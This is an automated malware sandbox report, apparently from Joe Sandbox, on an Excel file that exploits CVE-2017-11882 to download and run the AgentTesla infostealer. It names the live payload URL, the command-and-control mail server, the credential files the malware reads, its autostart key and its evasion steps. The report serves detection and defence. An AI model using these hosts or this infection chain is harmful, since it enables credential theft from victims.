                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: Yara matchFile source: 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: joewealth28743.exe PID: 2988, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 1888, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 2792, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 8.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Nwefile.exe.33d6ac0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Nwefile.exe.33d6ac0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.joewealth28743.exe.36b6ac0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.joewealth28743.exe.36b6ac0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.joewealth28743.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Nwefile.exe.3656ac0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Nwefile.exe.3656ac0.5.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2353745503.0000000002723000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: joewealth28743.exe PID: 1980, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: joewealth28743.exe PID: 2988, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 1888, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 2792, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 2664, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 2768, type: MEMORY
                      Source: Yara matchFile source: 8.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Nwefile.exe.33d6ac0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Nwefile.exe.33d6ac0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.joewealth28743.exe.36b6ac0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.joewealth28743.exe.36b6ac0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.joewealth28743.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Nwefile.exe.3656ac0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Nwefile.exe.3656ac0.5.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Process Injection112Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerSecurity Software Discovery311SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing12NTDSProcess Discovery2Distributed Component Object ModelClipboard Data1Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsVirtualization/Sandbox Evasion131SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol32Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 412910 Sample: 99feb78a_by_Libranalysis Startdate: 13/05/2021 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Multi AV Scanner detection for domain / URL 2->47 49 Found malware configuration 2->49 51 14 other signatures 2->51 7 EQNEDT32.EXE 11 2->7         started        12 Nwefile.exe 2->12         started        14 Nwefile.exe 2->14         started        16 EXCEL.EXE 57 12 2->16         started        process3 dnsIp4 39 carbinz.gq 185.239.243.112, 49167, 80 CLOUDIE-AS-APCloudieLimitedHK Moldova Republic of 7->39 31 C:\Users\user\AppData\...\joewealth28743.exe, PE32 7->31 dropped 33 C:\Users\user\AppData\...\joewealthx[1].exe, PE32 7->33 dropped 61 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->61 18 joewealth28743.exe 1 5 7->18         started        63 Multi AV Scanner detection for dropped file 12->63 65 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->65 67 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 12->67 21 Nwefile.exe 2 12->21         started        69 Injects a PE file into a foreign processes 14->69 23 Nwefile.exe 2 14->23         started        35 C:\Users\...\~$99feb78a_by_Libranalysis.xlsx, data 16->35 dropped file5 signatures6 process7 dnsIp8 53 Multi AV Scanner detection for dropped file 18->53 55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->55 57 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 18->57 59 Injects a PE file into a foreign processes 18->59 26 joewealth28743.exe 1 4 18->26         started        41 mail.orienttech.com.qa 23->41 signatures9 process10 dnsIp11 43 mail.orienttech.com.qa 162.241.85.66, 49168, 49169, 49170 OIS1US United States 26->43 37 C:\Users\user\AppData\Roaming\...37wefile.exe, PE32 26->37 dropped 71 Tries to steal Mail credentials (via file access) 26->71 73 Tries to harvest and steal ftp login credentials 26->73 75 Tries to harvest and steal browser information (history, passwords, etc) 26->75 77 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->77 file12 signatures13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      99feb78a_by_Libranalysis.xlsx39%VirustotalBrowse
                      99feb78a_by_Libranalysis.xlsx43%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                      99feb78a_by_Libranalysis.xlsx100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exe49%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe49%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Roaming\joewealth28743.exe49%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      8.2.Nwefile.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File
                      6.2.Nwefile.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File
                      4.2.joewealth28743.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      carbinz.gq14%VirustotalBrowse
                      mail.orienttech.com.qa2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://mail.orienttech.com.qa2%VirustotalBrowse
                      http://mail.orienttech.com.qa0%Avira URL Cloudsafe
                      http://yyfqMq.com0%Avira URL Cloudsafe
                      https://YbUuTY812ORW4eX3VhL.com0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://carbinz.gq/modex/joewealthx.exe0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      carbinz.gq
                      		185.239.243.112
                      		truetrueunknown
                      mail.orienttech.com.qa
                      		162.241.85.66
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://carbinz.gq/modex/joewealthx.exetrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1joewealth28743.exe, 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, Nwefile.exe, 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://api.ipify.org%GETMozilla/5.0Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		low
                      http://DynDns.comDynDNSNwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.%s.comPAjoewealth28743.exe, 00000004.00000002.2357578553.0000000005BE0000.00000002.00000001.sdmp, Nwefile.exe, 00000006.00000002.2240959548.0000000005E30000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		low
                      http://mail.orienttech.com.qajoewealth28743.exe, 00000004.00000002.2353553201.000000000260C000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2352689728.0000000002498000.00000004.00000001.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.joewealth28743.exe, 00000004.00000002.2357578553.0000000005BE0000.00000002.00000001.sdmp, Nwefile.exe, 00000006.00000002.2240959548.0000000005E30000.00000002.00000001.sdmpfalse
                        		high
                        http://yyfqMq.comNwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://YbUuTY812ORW4eX3VhL.comjoewealth28743.exe, 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hajoewealth28743.exe, 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, Nwefile.exe, 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://api.ipify.org%joewealth28743.exe, 00000004.00000002.2352896428.000000000243A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		low
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipjoewealth28743.exe, 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, joewealth28743.exe, 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, Nwefile.exe, 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, Nwefile.exe, 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, Nwefile.exe, 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        162.241.85.66
                        		mail.orienttech.com.qaUnited States
                        		26337OIS1UStrue
                        185.239.243.112
                        		carbinz.gqMoldova Republic of
                        		55933CLOUDIE-AS-APCloudieLimitedHKtrue

                        General Information

                        Joe Sandbox Version:32.0.0 Black Diamond
                        Analysis ID:412910
                        Start date:13.05.2021
                        Start time:03:21:11
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 11m 59s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:99feb78a_by_Libranalysis (renamed file extension from none to xlsx)
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:9
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winXLSX@12/4@14/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 2% (good quality ratio 1.4%)
                        • Quality average: 41%
                        • Quality standard deviation: 33.9%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        Show All
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • TCP Packets have been reduced to 100
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        03:22:00API Interceptor43x Sleep call for process: EQNEDT32.EXE modified
                        03:22:02API Interceptor1211x Sleep call for process: joewealth28743.exe modified
                        03:22:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nwefile C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
                        03:22:36API Interceptor854x Sleep call for process: Nwefile.exe modified
                        03:22:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Nwefile C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        162.241.85.66Order QID R.exeGet hashmaliciousBrowse
                          scan doc_pdf.exeGet hashmaliciousBrowse
                            payment invoice.docGet hashmaliciousBrowse
                              payment receipt.docGet hashmaliciousBrowse
                                wealthsecx.exeGet hashmaliciousBrowse
                                  Bank receipt.docGet hashmaliciousBrowse
                                    07BhuWSD6z.exeGet hashmaliciousBrowse
                                      LIST OF ITEMS.docGet hashmaliciousBrowse
                                        Drawings_pdf.exeGet hashmaliciousBrowse
                                          PO No. 2995_pdf.exeGet hashmaliciousBrowse
                                            185.239.243.112wed.docGet hashmaliciousBrowse
                                            • vespang.ga/epicc/jo/2bZYXtMN07sLYoY.exe
                                            ORDER CONFIRMATION.docGet hashmaliciousBrowse
                                            • vespang.ga/epicc/bills/iLvdKqmuKQkvQsj.exe
                                            abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                            • vespang.ga/favico/mbop.exe
                                            RFQ Plasma cutting machine.docGet hashmaliciousBrowse
                                            • vespang.ga/epicc/jaa/KSSL9sczaa9rCRx.exe
                                            Price List.docGet hashmaliciousBrowse
                                            • vespang.ga/discovery/yg/s1XvWL9frR0j2U7.exe
                                            Enq 557.docGet hashmaliciousBrowse
                                            • vespang.ga/power/dj/PM7uJ2f7U1BfNfQ.exe
                                            b98b396b_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                            • carbinz.gq/modex/chungx.exe
                                            f8198274_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                            • vespang.ga/favico/bdell.exe
                                            PO 4302003683.docGet hashmaliciousBrowse
                                            • vespang.ga/gunns/fada/j5nRNKhh75Uhr2l.exe
                                            Tender Overview 10052021.docGet hashmaliciousBrowse
                                            • vespang.ga/discovery/lik/ALXxGkCQUwQUkab.exe
                                            ORDER 10.05.docGet hashmaliciousBrowse
                                            • vespang.ga/gunns/jojo/axD70r2UMtC1a0x.exe
                                            purchase request.docGet hashmaliciousBrowse
                                            • vespang.ga/gunns/dj/HxYnDK2UQPV8rvj.exe
                                            Payment Swift.docGet hashmaliciousBrowse
                                            • carbinz.gq/modex/prosperx.exe
                                            NEW ORDER LIST.docGet hashmaliciousBrowse
                                            • vespang.ga/gunns/pop/tUuDajpoTJVbvlB.exe
                                            Company Profile.docGet hashmaliciousBrowse
                                            • vespang.ga/gunns/jas/qI7c2elxsuXF0OB.exe
                                            RFQ KR-21-087.docGet hashmaliciousBrowse
                                            • vespang.ga/epic/ziko/9OnQqWMQOlva2b1.exe
                                            INQUIRY 71652628.docGet hashmaliciousBrowse
                                            • vespang.ga/epic/ok/DEAGdmkYSe4x7Hi.exe
                                            Payment Note.xlsxGet hashmaliciousBrowse
                                            • carbinz.gq/modex/kellyx.exe
                                            aea58eb7_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                            • carbinz.gq/modex/shakix.exe
                                            a37e9308_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                            • vespang.ga/favico/obn.exe

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            carbinz.gqb98b396b_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            Payment Swift.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            Payment Note.xlsxGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            aea58eb7_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            PO_001412.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            items.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            RFQ INQ HCH2323ED.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            c8080fbf_by_Libranalysis.rtfGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            Inquiry 05042021.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            machine spares .docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            SWIFT COPY.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            HCU213DES.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            PO 9661641.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            DocNo2300058329.doc__.rtfGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            payment invoice.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            Request for New Quote - Valve Ist Order.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            INV 57474545.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            Request for Quotation_28042021.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            Signed Contract.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            DVO100024000.docGet hashmaliciousBrowse
                                            • 185.239.243.112
                                            mail.orienttech.com.qaOrder QID R.exeGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            scan doc_pdf.exeGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            payment invoice.docGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            SecuriteInfo.com.Trojan.Siggen13.10233.30629.exeGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            payment receipt.docGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            cLQd2QVOWu.exeGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            wealthsecx.exeGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            Bank receipt.docGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            07BhuWSD6z.exeGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            LIST OF ITEMS.docGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            Drawings_pdf.exeGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            PO#BC210243_pdf.exeGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            enquries.pdf.exeGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            SecuriteInfo.com.Artemis9DECF18E822A.1711.exeGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            PO No. 2995_pdf.exeGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
                                            • 162.241.85.66

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            OIS1USstatistic-482095214.xlsGet hashmaliciousBrowse
                                            • 162.241.2.77
                                            statistic-482095214.xlsGet hashmaliciousBrowse
                                            • 162.241.2.77
                                            Order QID R.exeGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            slot Charges.exeGet hashmaliciousBrowse
                                            • 162.241.85.231
                                            scan doc_pdf.exeGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            generated order 257404.xlsmGet hashmaliciousBrowse
                                            • 162.241.85.241
                                            9e7d034c_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                            • 162.241.2.137
                                            SecuriteInfo.com.VB.Trojan.Valyria.4579.10155.xlsmGet hashmaliciousBrowse
                                            • 162.241.2.137
                                            SecuriteInfo.com.VB.Trojan.Valyria.4579.10155.xlsmGet hashmaliciousBrowse
                                            • 162.241.2.137
                                            SecuriteInfo.com.VB.Trojan.Valyria.4579.18506.xlsmGet hashmaliciousBrowse
                                            • 162.241.2.137
                                            11710b54_by_Libranalysis.exeGet hashmaliciousBrowse
                                            • 192.185.147.20
                                            a37e9308_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                            • 192.185.147.20
                                            8c2d96ab_by_Libranalysis.exeGet hashmaliciousBrowse
                                            • 162.241.85.231
                                            4GGwmv0AJm.exeGet hashmaliciousBrowse
                                            • 192.185.147.148
                                            payment invoice.docGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            Purchase Order_.exeGet hashmaliciousBrowse
                                            • 162.241.85.194
                                            INVOICES..exeGet hashmaliciousBrowse
                                            • 162.241.85.194
                                            INVOICE.pdf'.exeGet hashmaliciousBrowse
                                            • 162.241.85.194
                                            svch.exeGet hashmaliciousBrowse
                                            • 162.241.2.107
                                            payment receipt.docGet hashmaliciousBrowse
                                            • 162.241.85.66
                                            CLOUDIE-AS-APCloudieLimitedHKPOusOmLR11.exeGet hashmaliciousBrowse
                                            • 185.227.153.177
                                            Gyxrui4Itd.exeGet hashmaliciousBrowse
